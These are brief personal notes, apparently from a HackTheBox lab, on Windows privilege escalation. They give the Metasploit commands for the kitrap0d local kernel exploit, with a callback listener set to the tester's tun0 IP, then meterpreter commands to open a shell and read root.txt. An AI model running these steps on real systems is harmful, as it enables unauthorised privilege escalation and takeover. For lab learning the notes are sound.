Metasploit

Kitrap0d

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

You can background on meterpreter, just take note to which session it is:

Pick an exploit from the suggester scan earlier and try:

use exploit/windows/local/ms10_015_kitrap0d
set session 7
set lhost 10.10.14.19 #this is tun0 IP
set lport 7070
run

meterpreter:

getuid
shell

HackTheBox have hashes on the Desktop of different users

Windows equivilant of ls is:

dir

Windows equivilant of cat is:

type
type root.txt